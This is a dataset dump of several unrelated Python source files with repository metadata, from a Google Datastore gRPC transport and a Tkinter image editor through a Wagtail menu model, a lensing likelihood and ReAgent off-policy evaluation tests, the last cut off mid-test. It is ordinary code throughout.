credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(cls,
host: str = 'datastore.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def lookup(self) -> Callable[
[datastore.LookupRequest],
datastore.LookupResponse]:
r"""Return a callable for the lookup method over gRPC.
Looks up entities by key.
Returns:
Callable[[~.LookupRequest],
~.LookupResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'lookup' not in self._stubs:
self._stubs['lookup'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Lookup',
request_serializer=datastore.LookupRequest.serialize,
response_deserializer=datastore.LookupResponse.deserialize,
)
return self._stubs['lookup']
@property
def run_query(self) -> Callable[
[datastore.RunQueryRequest],
datastore.RunQueryResponse]:
r"""Return a callable for the run query method over gRPC.
Queries for entities.
Returns:
Callable[[~.RunQueryRequest],
~.RunQueryResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'run_query' not in self._stubs:
self._stubs['run_query'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/RunQuery',
request_serializer=datastore.RunQueryRequest.serialize,
response_deserializer=datastore.RunQueryResponse.deserialize,
)
return self._stubs['run_query']
@property
def begin_transaction(self) -> Callable[
[datastore.BeginTransactionRequest],
datastore.BeginTransactionResponse]:
r"""Return a callable for the begin transaction method over gRPC.
Begins a new transaction.
Returns:
Callable[[~.BeginTransactionRequest],
~.BeginTransactionResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'begin_transaction' not in self._stubs:
self._stubs['begin_transaction'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/BeginTransaction',
request_serializer=datastore.BeginTransactionRequest.serialize,
response_deserializer=datastore.BeginTransactionResponse.deserialize,
)
return self._stubs['begin_transaction']
@property
def commit(self) -> Callable[
[datastore.CommitRequest],
datastore.CommitResponse]:
r"""Return a callable for the commit method over gRPC.
Commits a transaction, optionally creating, deleting
or modifying some entities.
Returns:
Callable[[~.CommitRequest],
~.CommitResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'commit' not in self._stubs:
self._stubs['commit'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Commit',
request_serializer=datastore.CommitRequest.serialize,
response_deserializer=datastore.CommitResponse.deserialize,
)
return self._stubs['commit']
@property
def rollback(self) -> Callable[
[datastore.RollbackRequest],
datastore.RollbackResponse]:
r"""Return a callable for the rollback method over gRPC.
Rolls back a transaction.
Returns:
Callable[[~.RollbackRequest],
~.RollbackResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'rollback' not in self._stubs:
self._stubs['rollback'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Rollback',
request_serializer=datastore.RollbackRequest.serialize,
response_deserializer=datastore.RollbackResponse.deserialize,
)
return self._stubs['rollback']
@property
def allocate_ids(self) -> Callable[
[datastore.AllocateIdsRequest],
datastore.AllocateIdsResponse]:
r"""Return a callable for the allocate ids method over gRPC.
Allocates IDs for the given keys, which is useful for
referencing an entity before it is inserted.
Returns:
Callable[[~.AllocateIdsRequest],
~.AllocateIdsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'allocate_ids' not in self._stubs:
self._stubs['allocate_ids'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/AllocateIds',
request_serializer=datastore.AllocateIdsRequest.serialize,
response_deserializer=datastore.AllocateIdsResponse.deserialize,
)
return self._stubs['allocate_ids']
@property
def reserve_ids(self) -> Callable[
[datastore.ReserveIdsRequest],
datastore.ReserveIdsResponse]:
r"""Return a callable for the reserve ids method over gRPC.
Prevents the supplied keys' IDs from being auto-
llocated by Cloud Datastore.
Returns:
Callable[[~.ReserveIdsRequest],
~.ReserveIdsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'reserve_ids' not in self._stubs:
self._stubs['reserve_ids'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/ReserveIds',
request_serializer=datastore.ReserveIdsRequest.serialize,
response_deserializer=datastore.ReserveIdsResponse.deserialize,
)
return self._stubs['reserve_ids']
__all__ = (
'DatastoreGrpcTransport',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
749714a844151fe4c0679e06c57f2a0d1054a231 | f6786f5f51c0a71a09213e2f729766d1a04dffa2 | /두근두근_파이썬/12_PIL_Library/Challenge/353_mini_photo_shap.py | 055593ec369b0c2a9d65d294dc06ecc7d76899b9 | [] | no_license | SuperstarterJaeeun/Learn-Programming-Book | 4f075fdec386a0449da8d0d08bb8f1b6d6b2f304 | f768acfffcb20b9fc97946ca491f6ffb20671896 | refs/heads/master | 2023-07-24T07:13:24.374240 | 2021-09-06T14:56:02 | 2021-09-06T14:56:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,554 | py | import tkinter as tk
from PIL import Image, ImageTk, ImageFilter
from tkinter import filedialog as fd
im = None
tk_img = None
def open() :
global im, tk_img
filename = fd.askopenfilename()
im = Image.open(filename)
tk_img = ImageTk.PhotoImage(im)
canvas.create_image(250, 250, image = tk_img)
window.update()
def quit() :
window.quit()
def image_rotate() :
global im, tk_img
out = im.rotate(45)
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
def image_blur() :
global im, tk_img
out = im.filter(ImageFilter.BLUR)
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
def image_gray() :
global im, tk_img
out = im.convert('L')
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
window = tk.Tk()
canvas = tk.Canvas(window, width = 500, height = 500)
canvas.pack()
menubar = tk.Menu(window)
filemenu = tk.Menu(menubar)
ipmenu = tk.Menu(menubar)
filemenu.add_command(label = "열기", command = open)
filemenu.add_command(label = "종료", command = quit)
ipmenu.add_command(label = "영상회전", command = image_rotate)
ipmenu.add_command(label = "영상흐리게", command = image_blur)
ipmenu.add_command(label = "영상흑백", command = image_gray)
menubar.add_cascade(label = "파일", menu = filemenu)
menubar.add_cascade(label = "영상처리", menu = ipmenu)
window.config(menu = menubar)
window.mainloop() | [
"[email protected]"
] | |
b06063130be1283cf92de4bb5fd9ca2e5808c674 | c52f105297f4f9bddeb31eba1615d8d04ea9742a | /tol/config/__init__.py | 2b2b20cff0fcc4e2ff9bfc4ac5ad05848da2c3c0 | [] | no_license | egdman/tol-revolve | 35b6f96bc564d9093c0041faa6558d5ed6330775 | b4050f749cb8701a219a3d8383c022e7ca2cf04e | refs/heads/master | 2020-12-25T04:28:28.561577 | 2018-05-24T16:06:53 | 2018-05-24T16:06:53 | 50,343,840 | 1 | 4 | null | 2016-02-22T18:20:22 | 2016-01-25T10:37:06 | Python | UTF-8 | Python | false | false | 70 | py | from .config import parser, str_to_address
__author__ = 'Elte Hupkes'
| [
"[email protected]"
] | |
5ca87bde902dd3bf4220c279adaa44f9c33f59ee | 5b5178d073d6b1247feab1314004bae326bfcdba | /examples/comm_example3.py | e1cf73be2bba9c04fb90e163c6f7f8f0a9e10d25 | [] | no_license | abdcelikkanat/Evaluation | 4df6512e43af17e4ec9decd54e47efb88ac11952 | 8aec5948f40b1d4601d6408a8bee5b41a77c1e35 | refs/heads/master | 2021-06-16T05:08:37.057794 | 2019-04-15T09:20:36 | 2019-04-15T09:20:36 | 135,060,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import sys
sys.path.append("../../deepwalk/deepwalk")
import graph as dw
import networkx as nx
from gensim.models.word2vec import Word2Vec
from graphbase import randomgraph
from sklearn.cluster import KMeans
from community_detection.community_detection import *
N = 1000
kmeans_num_of_communities = 3
if kmeans_num_of_communities == 2:
sbm_params = {}
sbm_params['sbm_N'] = N # the number of nodes
sbm_params['sbm_P'] = [[0.7, 0.5], [0.4, 0.6]] # edge probability matrix between nodes belonging different communities
sbm_params['sbm_block_sizes'] = [300, 700]
elif kmeans_num_of_communities == 3:
sbm_params = {}
sbm_params['sbm_N'] = N # the number of nodes
sbm_params['sbm_P'] = [[0.7, 0.3, 0.4],
[0.3, 0.6, 0.2],
[0.4, 0.2, 0.9]] # edge probability matrix between nodes belonging different communities
sbm_params['sbm_block_sizes'] = [300, 500, 200]
def get_embeddings(embedding_file):
id2node = []
x = []
with open(embedding_file, 'r') as f:
f.readline()
for line in f.readlines():
tokens = line.strip().split()
id2node.append(tokens[0])
x.append([float(value) for value in tokens[1:]])
return id2node, x
g = nx.read_gml("./outputs/synthetic_n1000_c3.gml")
embedding_file = "./outputs/synthetic_n1000_c3_n80_l10_w10_k50_deepwalk_final_max.embedding"
#embedding_file = "./outputs/synthetic_n1000_c3_n80_l10_w10_k50_deepwalk_node.embedding"
id2node, x = get_embeddings(embedding_file)
kmeans = KMeans(n_clusters=kmeans_num_of_communities, random_state=0)
kmeans.fit(x)
labels = kmeans.labels_.tolist()
communities_true = nx.get_node_attributes(g, name='community')
communities_pred = {id2node[i]: [labels[i]] for i in range(len(x))}
#print(communities_true)
#print(communities_pred)
comdetect = CommunityDetection()
comdetect.set_graph(nxg=g)
number_of_communities = comdetect.detect_number_of_communities()
comdetect.set_number_of_communities(number_of_communities)
score = comdetect.nmi_score(communities_pred)
print("Score: {}".format(score))
| [
"[email protected]"
] | |
c1304d7e44ef08ace8e1237716eab05f1f68aca8 | e0980f704a573894350e285f66f4cf390837238e | /.history/menus/models_20201030152904.py | 6448852a1a6a190459f0a1fdf0323ae50934112d | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | from django.db import models
from django_extensions.db.fields import AutoSlugField
from modelcluster.models import ClusterableModel
from modelcluster.fields import ParentalKey
from wagtail.core.models import Orderable
from wagtail.admin.edit_handlers import FieldPanel, PageChooserPanel, InlinePanel
class MenuItem(Orderable):
link_title = models.CharField(blank=True, max_length=50)
link_url = models.CharField(max_length=500, blank=True)
link_page = models.ForeignKey(
'wagtailcore.Page',
null=True,
blank=True,
related_name='+',
on_delete=models.CASCADE,
)
open_in_new_tab = models.BooleanField(
default=False,
blank=True,
)
panels = [
FieldPanel('link_title'),
FieldPanel('link_url'),
PageChooserPanel('link_page'),
FieldPanel('open_in_new_tab',),
]
page = ParentalKey('Menu', related_name='menu_items')
@property
def link(self):
if self.link_page:
return self.link_page
elif self.link_url:
return self.link_url
return '#'
@property
def title(self):
if self.link_page and not self.link_title:
return self.link_page.title
elif self.link_title:
return self.link_title
class Menu(ClusterableModel):
title = models.CharField(max_length=100)
slug = AutoSlugField(
populate_from='title',
editable=True,
)
panels = [
FieldPanel('title'),
FieldPanel('slug'),
InlinePanel('menu_items', label='Menu Item'),
]
def __str__(self):
return self.title
| [
"[email protected]"
] | |
5f0f06a88ed13ff447815bfff00bb6f12829139f | e3b5f5a30c9ff552d0d67308410e595f7ba50e45 | /hierarc/Likelihood/LensLikelihood/td_mag_likelihood.py | 13c0388b57e84f80cf2f6f19eb9c719eb6f51c86 | [
"BSD-3-Clause"
] | permissive | LBJ-Wade/hierarc_SGL | 2332c424d6868ce099c736eaf5fea58a9282cd0c | 1dc2be90f44f99e82ab7014f2027fbb077b14f98 | refs/heads/main | 2023-08-12T02:23:14.328741 | 2021-08-16T21:06:01 | 2021-08-16T21:06:01 | 411,586,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,553 | py | import numpy as np
from lenstronomy.Util import constants as const
from lenstronomy.Util.data_util import magnitude2cps
class TDMagLikelihood(object):
"""
likelihood of time delays and magnification likelihood
This likelihood uses linear flux units and linear lensing magnifications.
"""
def __init__(self, time_delay_measured, cov_td_measured, amp_measured, cov_amp_measured,
fermat_diff, magnification_model, cov_model, magnitude_zero_point=20):
"""
:param time_delay_measured: array, relative time delays (relative to the first image) [days]
:param cov_td_measured: 2d array, error covariance matrix of time delay measurement [days^2]
:param amp_measured: array, amplitudes of measured fluxes of image positions
:param cov_amp_measured: 2d array, error covariance matrix of the measured amplitudes
:param fermat_diff: mean Fermat potential differences (relative to the first image) in arcsec^2
:param magnification_model: mean magnification of the model prediction
:param cov_model: 2d array (length relative time delays + image amplitudes); model fermat potential differences
and lensing magnification covariances
:param magnitude_zero_point: magnitude zero point for which the image amplitudes and covariance matrix are
defined
"""
self._data_vector = np.append(time_delay_measured, amp_measured)
self._cov_td_measured = np.array(cov_td_measured)
self._cov_amp_measured = np.array(cov_amp_measured)
# check sizes of covariances matches
n_tot = len(self._data_vector)
self._n_td = len(time_delay_measured)
self._n_amp = len(amp_measured)
assert self._n_td == len(cov_td_measured)
assert self._n_amp == len(cov_amp_measured)
assert n_tot == len(cov_model)
# merge data covariance matrices from time delay and image amplitudes
self._cov_data = np.zeros((n_tot, n_tot))
self._cov_data[:self._n_td, :self._n_td] = self._cov_td_measured
self._cov_data[self._n_td:, self._n_td:] = self._cov_amp_measured
#self._fermat_diff = fermat_diff # in units arcsec^2
self._fermat_unit_conversion = const.Mpc / const.c / const.day_s * const.arcsec ** 2
#self._mag_model = mag_model
self._model_tot = np.append(fermat_diff, magnification_model)
self._cov_model = cov_model
self.num_data = n_tot
self._magnitude_zero_point = magnitude_zero_point
def log_likelihood(self, ddt, mu_intrinsic):
"""
:param ddt: time-delay distance (physical Mpc)
:param mu_intrinsic: intrinsic brightness of the source (already incorporating the inverse MST transform)
:return: log likelihood of the measured magnified images given the source brightness
"""
model_vector, cov_tot = self._model_cov(ddt, mu_intrinsic)
# invert matrix
try:
cov_tot_inv = np.linalg.inv(cov_tot)
except:
return -np.inf
# difference to data vector
delta = self._data_vector - model_vector
# evaluate likelihood
lnlikelihood = -delta.dot(cov_tot_inv.dot(delta)) / 2.
sign_det, lndet = np.linalg.slogdet(cov_tot)
lnlikelihood -= 1 / 2. * (self.num_data * np.log(2 * np.pi) + lndet)
return lnlikelihood
def _model_cov(self, ddt, mu_intrinsic):
"""
combined covariance matrix of the data and model when marginialized over the Gaussian model uncertainties
in the Fermat potential and magnification.
:param ddt: time-delay distance (physical Mpc)
:param mu_intrinsic: intrinsic brightness of the source (already incorporating the inverse MST transform)
:return: model vector, combined covariance matrix
"""
# compute model predicted magnified image amplitude and time delay
amp_intrinsic = magnitude2cps(magnitude=mu_intrinsic, magnitude_zero_point=self._magnitude_zero_point)
model_scale = np.append(ddt * self._fermat_unit_conversion * np.ones(self._n_td),
amp_intrinsic * np.ones(self._n_amp))
model_vector = model_scale * self._model_tot
# scale model covariance matrix with model_scale vector (in quadrature)
cov_model = model_scale * (self._cov_model * model_scale).T
# combine data and model covariance matrix
cov_tot = self._cov_data + cov_model
return model_vector, cov_tot
| [
"[email protected]"
] | |
8301789d83ca70ea4d0b557b011359a5b8e1ed37 | 956e39e6bcc2c22fec9baa6f7c732c40a8da4ef9 | /reagent/test/evaluation/test_ope_integration.py | 974605113e3093b9380b024747c1cdbb84c3fedf | [
"BSD-3-Clause"
] | permissive | justcherie/ReAgent | 5d3c62bd2fb1cc565417b31cc8e22a1473d134dc | f6b737b3d49660c48087b311f591fd24fb025211 | refs/heads/master | 2023-03-19T14:35:32.805656 | 2021-03-08T17:28:09 | 2021-03-08T17:30:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,467 | py | import logging
import random
import unittest
import numpy as np
import torch
from reagent import types as rlt
from reagent.evaluation.evaluation_data_page import EvaluationDataPage
from reagent.evaluation.ope_adapter import (
OPEstimatorAdapter,
SequentialOPEstimatorAdapter,
)
from reagent.ope.estimators.contextual_bandits_estimators import (
DMEstimator,
DoublyRobustEstimator,
IPSEstimator,
SwitchDREstimator,
SwitchEstimator,
)
from reagent.ope.estimators.sequential_estimators import (
DoublyRobustEstimator as SeqDREstimator,
EpsilonGreedyRLPolicy,
RandomRLPolicy,
RLEstimatorInput,
)
from reagent.ope.estimators.types import Action, ActionSpace
from reagent.ope.test.envs import PolicyLogGenerator
from reagent.ope.test.gridworld import GridWorld, NoiseGridWorldModel
from reagent.ope.trainers.rl_tabular_trainers import (
DPTrainer,
DPValueFunction,
TabularPolicy,
)
from reagent.test.evaluation.test_evaluation_data_page import (
FakeSeq2SlateRewardNetwork,
FakeSeq2SlateTransformerNet,
)
logger = logging.getLogger(__name__)
def rlestimator_input_to_edp(
input: RLEstimatorInput, num_actions: int
) -> EvaluationDataPage:
mdp_ids = []
logged_propensities = []
logged_rewards = []
action_mask = []
model_propensities = []
model_values = []
for mdp in input.log:
mdp_id = len(mdp_ids)
for t in mdp:
mdp_ids.append(mdp_id)
logged_propensities.append(t.action_prob)
logged_rewards.append(t.reward)
assert t.action is not None
action_mask.append(
[1 if x == t.action.value else 0 for x in range(num_actions)]
)
assert t.last_state is not None
model_propensities.append(
[
input.target_policy(t.last_state)[Action(x)]
for x in range(num_actions)
]
)
assert input.value_function is not None
model_values.append(
[
input.value_function(t.last_state, Action(x))
for x in range(num_actions)
]
)
return EvaluationDataPage(
mdp_id=torch.tensor(mdp_ids).reshape(len(mdp_ids), 1),
logged_propensities=torch.tensor(logged_propensities).reshape(
(len(logged_propensities), 1)
),
logged_rewards=torch.tensor(logged_rewards).reshape((len(logged_rewards), 1)),
action_mask=torch.tensor(action_mask),
model_propensities=torch.tensor(model_propensities),
model_values=torch.tensor(model_values),
sequence_number=torch.tensor([]),
model_rewards=torch.tensor([]),
model_rewards_for_logged_action=torch.tensor([]),
)
class TestOPEModuleAlgs(unittest.TestCase):
GAMMA = 0.9
CPE_PASS_BAR = 1.0
CPE_MAX_VALUE = 2.0
MAX_HORIZON = 1000
NOISE_EPSILON = 0.3
EPISODES = 2
def test_gridworld_sequential_adapter(self):
"""
Create a gridworld environment, logging policy, and target policy
Evaluates target policy using the direct OPE sequential doubly robust estimator,
then transforms the log into an evaluation data page which is passed to the ope adapter.
This test is meant to verify the adaptation of EDPs into RLEstimatorInputs as employed
by ReAgent since ReAgent provides EDPs to Evaluators. Going from EDP -> RLEstimatorInput
is more involved than RLEstimatorInput -> EDP since the EDP does not store the state
at each timestep in each MDP, only the corresponding logged outputs & model outputs.
Thus, the adapter must do some tricks to represent these timesteps as states so the
ope module can extract the correct outputs.
Note that there is some randomness in the model outputs since the model is purposefully
noisy. However, the same target policy is being evaluated on the same logged walks through
the gridworld, so the two results should be close in value (within 1).
"""
random.seed(0)
np.random.seed(0)
torch.random.manual_seed(0)
device = torch.device("cuda") if torch.cuda.is_available() else None
gridworld = GridWorld.from_grid(
[
["s", "0", "0", "0", "0"],
["0", "0", "0", "W", "0"],
["0", "0", "0", "0", "0"],
["0", "W", "0", "0", "0"],
["0", "0", "0", "0", "g"],
],
max_horizon=TestOPEModuleAlgs.MAX_HORIZON,
)
action_space = ActionSpace(4)
opt_policy = TabularPolicy(action_space)
trainer = DPTrainer(gridworld, opt_policy)
value_func = trainer.train(gamma=TestOPEModuleAlgs.GAMMA)
behavivor_policy = RandomRLPolicy(action_space)
target_policy = EpsilonGreedyRLPolicy(
opt_policy, TestOPEModuleAlgs.NOISE_EPSILON
)
model = NoiseGridWorldModel(
gridworld,
action_space,
epsilon=TestOPEModuleAlgs.NOISE_EPSILON,
max_horizon=TestOPEModuleAlgs.MAX_HORIZON,
)
value_func = DPValueFunction(target_policy, model, TestOPEModuleAlgs.GAMMA)
ground_truth = DPValueFunction(
target_policy, gridworld, TestOPEModuleAlgs.GAMMA
)
log = []
log_generator = PolicyLogGenerator(gridworld, behavivor_policy)
num_episodes = TestOPEModuleAlgs.EPISODES
for state in gridworld.states:
for _ in range(num_episodes):
log.append(log_generator.generate_log(state))
estimator_input = RLEstimatorInput(
gamma=TestOPEModuleAlgs.GAMMA,
log=log,
target_policy=target_policy,
value_function=value_func,
ground_truth=ground_truth,
)
edp = rlestimator_input_to_edp(estimator_input, len(model.action_space))
dr_estimator = SeqDREstimator(
weight_clamper=None, weighted=False, device=device
)
module_results = SequentialOPEstimatorAdapter.estimator_results_to_cpe_estimate(
dr_estimator.evaluate(estimator_input)
)
adapter_results = SequentialOPEstimatorAdapter(
dr_estimator, TestOPEModuleAlgs.GAMMA, device=device
).estimate(edp)
self.assertAlmostEqual(
adapter_results.raw,
module_results.raw,
delta=TestOPEModuleAlgs.CPE_PASS_BAR,
), f"OPE adapter results differed too much from underlying module (Diff: {abs(adapter_results.raw - module_results.raw)} > {TestOPEModuleAlgs.CPE_PASS_BAR})"
self.assertLess(
adapter_results.raw, TestOPEModuleAlgs.CPE_MAX_VALUE
), f"OPE adapter results are too large ({adapter_results.raw} > {TestOPEModuleAlgs.CPE_MAX_VALUE})"
def test_seq2slate_eval_data_page(self):
"""
Create 3 slate ranking logs and evaluate using Direct Method, Inverse
Propensity Scores, and Doubly Robust.
The logs are as follows:
state: [1, 0, 0], [0, 1, 0], [0, 0, 1]
indices in logged slates: [3, 2], [3, 2], [3, 2]
model output indices: [2, 3], [3, 2], [2, 3]
logged reward: 4, 5, 7
logged propensities: 0.2, 0.5, 0.4
predicted rewards on logged slates: 2, 4, 6
predicted rewards on model outputted slates: 1, 4, 5
predicted propensities: 0.4, 0.3, 0.7
When eval_greedy=True:
Direct Method uses the predicted rewards on model outputted slates.
Thus the result is expected to be (1 + 4 + 5) / 3
Inverse Propensity Scores would scale the reward by 1.0 / logged propensities
whenever the model output slate matches with the logged slate.
Since only the second log matches with the model output, the IPS result
is expected to be 5 / 0.5 / 3
Doubly Robust is the sum of the direct method result and propensity-scaled
reward difference; the latter is defined as:
1.0 / logged_propensities * (logged reward - predicted reward on logged slate)
* Indicator(model slate == logged slate)
Since only the second logged slate matches with the model outputted slate,
the DR result is expected to be (1 + 4 + 5) / 3 + 1.0 / 0.5 * (5 - 4) / 3
When eval_greedy=False:
Only Inverse Propensity Scores would be accurate. Because it would be too
expensive to compute all possible slates' propensities and predicted rewards
for Direct Method.
The expected IPS = (0.4 / 0.2 * 4 + 0.3 / 0.5 * 5 + 0.7 / 0.4 * 7) / 3
"""
batch_size = 3
state_dim = 3
src_seq_len = 2
tgt_seq_len = 2
candidate_dim = 2
reward_net = FakeSeq2SlateRewardNetwork()
seq2slate_net = FakeSeq2SlateTransformerNet()
src_seq = torch.eye(candidate_dim).repeat(batch_size, 1, 1)
tgt_out_idx = torch.LongTensor([[3, 2], [3, 2], [3, 2]])
tgt_out_seq = src_seq[
torch.arange(batch_size).repeat_interleave(tgt_seq_len),
tgt_out_idx.flatten() - 2,
].reshape(batch_size, tgt_seq_len, candidate_dim)
ptb = rlt.PreprocessedRankingInput(
state=rlt.FeatureData(float_features=torch.eye(state_dim)),
src_seq=rlt.FeatureData(float_features=src_seq),
tgt_out_seq=rlt.FeatureData(float_features=tgt_out_seq),
src_src_mask=torch.ones(batch_size, src_seq_len, src_seq_len),
tgt_out_idx=tgt_out_idx,
tgt_out_probs=torch.tensor([0.2, 0.5, 0.4]),
slate_reward=torch.tensor([4.0, 5.0, 7.0]),
extras=rlt.ExtraData(
sequence_number=torch.tensor([0, 0, 0]),
mdp_id=np.array(["0", "1", "2"]),
),
)
edp = EvaluationDataPage.create_from_tensors_seq2slate(
seq2slate_net, reward_net, ptb, eval_greedy=True
)
logger.info("---------- Start evaluating eval_greedy=True -----------------")
doubly_robust_estimator = OPEstimatorAdapter(DoublyRobustEstimator())
dm_estimator = OPEstimatorAdapter(DMEstimator())
ips_estimator = OPEstimatorAdapter(IPSEstimator())
switch_estimator = OPEstimatorAdapter(SwitchEstimator())
switch_dr_estimator = OPEstimatorAdapter(SwitchDREstimator())
doubly_robust = doubly_robust_estimator.estimate(edp)
inverse_propensity = ips_estimator.estimate(edp)
direct_method = dm_estimator.estimate(edp)
# Verify that Switch with low exponent is equivalent to IPS
switch_ips = switch_estimator.estimate(edp, exp_base=1)
# Verify that Switch with no candidates is equivalent to DM
